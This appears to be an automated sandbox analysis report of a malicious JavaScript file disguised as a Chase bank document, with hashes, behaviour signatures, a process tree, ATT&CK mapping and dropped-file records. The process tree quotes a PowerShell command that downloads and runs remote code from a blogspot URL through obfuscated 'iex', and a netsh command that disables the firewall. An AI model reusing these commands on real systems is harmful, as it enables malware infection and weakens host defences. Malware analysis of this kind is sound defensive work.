Analysis
-
max time kernel
143s -
max time network
271s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
16-01-2024 10:45
General
-
Target
New_ScanDoc#092387CHASEeAdvice.js
-
Size
1.4MB
-
MD5
286d534eb759c671fa9e79cfafd3bc85
-
SHA1
d165938c1c607618c5cb6d9d11cf5b371f007ac7
-
SHA256
77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
-
SHA512
3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
-
SSDEEP
192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
UAC bypass 3 TTPs 1 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Registers COM server for autorun 1 TTPs 2 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies registry class 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 35 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 62⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4a3dkgcd\4a3dkgcd.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7639.tmp" "c:\Users\Admin\AppData\Local\Temp\4a3dkgcd\CSCA1C908A7EDF046C88043681E4A51E7A5.TMP"4⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\4a3dkgcd\4a3dkgcd.dllFilesize
3KB
MD5b215617f60edf485138fed3ebe41c74d
SHA19c780185d017e67e54db1376267e13cc08b83526
SHA2561c778635f38da4179544176b8637e6032171f46aef27f072de08ee69692db27b
SHA51214cd36283e9686927db4f78bbf8e3c17dd4aea206ada1a4b8a44034811be3700101e51945b6140c553cd10edf7ea65e75a00428b1389401f719f1b14450979e1
-
C:\Users\Admin\AppData\Local\Temp\RES7639.tmpFilesize
1KB
MD51bde72f5b19daffd3ab768be69d20b0f
SHA1cd8cf78cd0ab524d4028b27e3ae95538372f1b4f
SHA2563bc57bbeb13d1c924120d9a861e82f3684b4d8a03b4923d6ef0e3eac37958b2e
SHA512c27193af67605c750ec12af9e563799326eb8a5c28e6902d7658564800b8137f4e4e03f714a7677f514f191413a573a9c7b8b97e18b5f4e562d9b93c58d70d43
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gfm0hvz4.4ot.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
\??\c:\Users\Admin\AppData\Local\Temp\4a3dkgcd\4a3dkgcd.0.csFilesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
\??\c:\Users\Admin\AppData\Local\Temp\4a3dkgcd\4a3dkgcd.cmdlineFilesize
369B
MD5147f840e180ed7532f849aaf30701b10
SHA1a8a114444fc3d77e6b43129800baf36edcecc618
SHA2568f41cb45288cb64dc8205f78a2071548d48aab5f18d18d57f3aae790b85559cd
SHA5126073df516bf4f9f257e2aba1207acfbd5b56a113fe936eb45622f45f8e01236c5958c39160a0897e8f4c32e9a25c2992430962fe28f96f8ccda3decccb639345
-
\??\c:\Users\Admin\AppData\Local\Temp\4a3dkgcd\CSCA1C908A7EDF046C88043681E4A51E7A5.TMPFilesize
652B
MD515a0a7667b44fdea46578ba7bfbdc1ef
SHA146b3adc8d7c21158cd38f323ac5b3da946f4575f
SHA2564a9a9d6f6aec25a3d628438e677952bdd9f399857b00b0cf2927f80ae369dfe3
SHA51221a85a8e15ab363fd8b862950938fab01e80abef57d19a6aca61c04be9934943f346990ad234a67c97165bca72bdbd5ecf0c9123778a22a61a887ae047e045f4
-
memory/1148-31-0x0000013843490000-0x000001384349E000-memory.dmpFilesize
56KB
-
memory/1148-34-0x00007FF997CB0000-0x00007FF998771000-memory.dmpFilesize
10.8MB
-
memory/1148-10-0x00007FF997CB0000-0x00007FF998771000-memory.dmpFilesize
10.8MB
-
memory/1148-28-0x000001385BBC0000-0x000001385BBC8000-memory.dmpFilesize
32KB
-
memory/1148-11-0x0000013843540000-0x0000013843550000-memory.dmpFilesize
64KB
-
memory/1148-13-0x0000013843540000-0x0000013843550000-memory.dmpFilesize
64KB
-
memory/1148-12-0x0000013843540000-0x0000013843550000-memory.dmpFilesize
64KB
-
memory/1148-30-0x000001385BD40000-0x000001385BE8E000-memory.dmpFilesize
1.3MB
-
memory/1148-5-0x000001385BBD0000-0x000001385BBF2000-memory.dmpFilesize
136KB
-
memory/1148-32-0x00000138434D0000-0x00000138434EA000-memory.dmpFilesize
104KB
-
memory/1148-33-0x000001385BD40000-0x000001385BE8E000-memory.dmpFilesize
1.3MB
-
memory/1148-14-0x000001385C520000-0x000001385C6E2000-memory.dmpFilesize
1.8MB
-
memory/1148-36-0x0000013843540000-0x0000013843550000-memory.dmpFilesize
64KB
-
memory/1148-37-0x0000013843540000-0x0000013843550000-memory.dmpFilesize
64KB
-
memory/1148-67-0x00007FF997CB0000-0x00007FF998771000-memory.dmpFilesize
10.8MB
-
memory/1148-66-0x000001385BD40000-0x000001385BE8E000-memory.dmpFilesize
1.3MB
-
memory/1148-63-0x000001385BD40000-0x000001385BE8E000-memory.dmpFilesize
1.3MB
-
memory/1148-59-0x0000013843540000-0x0000013843550000-memory.dmpFilesize
64KB
-
memory/1148-42-0x0000013843540000-0x0000013843550000-memory.dmpFilesize
64KB
-
memory/1168-62-0x0000000070000000-0x00000000705B1000-memory.dmpFilesize
5.7MB
-
memory/1168-52-0x0000000070000000-0x00000000705B1000-memory.dmpFilesize
5.7MB
-
memory/1168-51-0x0000000000C50000-0x0000000000C60000-memory.dmpFilesize
64KB
-
memory/1168-50-0x0000000070000000-0x00000000705B1000-memory.dmpFilesize
5.7MB
-
memory/1768-48-0x0000000070700000-0x0000000070CB1000-memory.dmpFilesize
5.7MB
-
memory/1768-71-0x0000000070700000-0x0000000070CB1000-memory.dmpFilesize
5.7MB
-
memory/1768-46-0x0000000000400000-0x000000000048C000-memory.dmpFilesize
560KB
-
memory/2648-40-0x00000000052E0000-0x0000000005884000-memory.dmpFilesize
5.6MB
-
memory/2648-44-0x0000000005040000-0x00000000050D2000-memory.dmpFilesize
584KB
-
memory/2648-43-0x0000000004F00000-0x0000000004F9C000-memory.dmpFilesize
624KB
-
memory/2648-41-0x0000000004DF0000-0x0000000004E56000-memory.dmpFilesize
408KB
-
memory/2648-47-0x0000000005890000-0x0000000005A52000-memory.dmpFilesize
1.8MB
-
memory/2648-39-0x0000000000760000-0x00000000007EC000-memory.dmpFilesize
560KB
-
memory/2648-38-0x0000000074480000-0x0000000074C30000-memory.dmpFilesize
7.7MB
-
memory/2648-68-0x00000000066E0000-0x00000000066EA000-memory.dmpFilesize
40KB
-
memory/2648-69-0x0000000074480000-0x0000000074C30000-memory.dmpFilesize
7.7MB
-
memory/2648-70-0x0000000005030000-0x0000000005040000-memory.dmpFilesize
64KB
-
memory/2648-45-0x0000000004EB0000-0x0000000004F00000-memory.dmpFilesize
320KB